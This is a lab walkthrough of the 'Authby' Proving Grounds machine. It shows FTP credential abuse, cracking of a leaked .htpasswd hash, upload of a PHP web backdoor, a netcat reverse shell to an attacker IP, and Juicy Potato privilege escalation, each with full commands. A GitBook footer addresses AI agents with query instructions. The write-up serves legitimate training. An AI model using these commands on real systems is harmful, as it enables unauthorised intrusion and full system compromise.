> For the complete documentation index, see [llms.txt](https://pentesting.zeyu2001.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pentesting.zeyu2001.com/proving-grounds/get-to-work/authby.md).
# Authby
## Service Enumeration
`nmapAutomator.sh -H 192.168.85.46 -t full`
`nmapAutomator.sh -H 192.168.85.46 -t vulns`
### FTP
Anonymous login allowed.
While we cannot access these files, we can see that there are some account names.
Using the account `admin:admin`, we get access to some other files.
The `.htaccess` and `.htpasswd` files are leaked.
.htaccess
```
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
Require valid-user
```
.htpasswd
```
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
```
Passing the `.htpasswd` hash into John the Ripper, we find the credentials to authenticate into the HTTP server.
### RDP
### Nonstandard Ports
### HTTP
Using the previously found credentials (`offsec:elite`), we can authenticate into the application.
### Subdirectory Enumeration
`gobuster dir -u http://192.168.85.46:242/ -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite`
`gobuster dir -u http://192.168.85.46:242/phpmyadmin -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite -s 200,204,301,302,307,401`
## Exploitation
Using the PHP backdoor from `/usr/share/webshells/php/simple-backdoor.php`, we can upload this backdoor through the `admin` FTP account to the web root. Then, we can visit the `simple-backdoor.php` and use the `cmd=` parameter to achieve RCE.
Copy `nc.exe` through SMB:
`http://192.168.85.46:242/simple-backdoor.php?cmd=copy \\192.168.49.85\ROPNOP\netcat\nc.exe .`
Trigger a reverse shell:
`http://192.168.85.46:242/simple-backdoor.php?cmd=nc.exe -e cmd.exe 192.168.49.85 443`
On our listening machine, we get a reverse shell.
## Privilege Escalation
First, we know that `SeImpersonatePrivilege` is enabled.
We can perform privilege escalation using Juicy Potato.
However, there are two challenges.
1. This is an x86 system, so we need an x86 Juicy Potato executable. I used the one from here:
2. The default CLSID doesn't work. Juicy Potato will return `COM -> recv failed with error: 10038`.
`systeminfo` shows that this is Windows Server 2008.
We can use one of the BITS CSLIDs from here: . I used `{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}`.
Now, we can use the `nc.exe` we transferred previously to get another reverse shell, this time with SYSTEM privileges.
`juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.49.85 443" -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}`
On our listening machine:
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://pentesting.zeyu2001.com/proving-grounds/get-to-work/authby.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.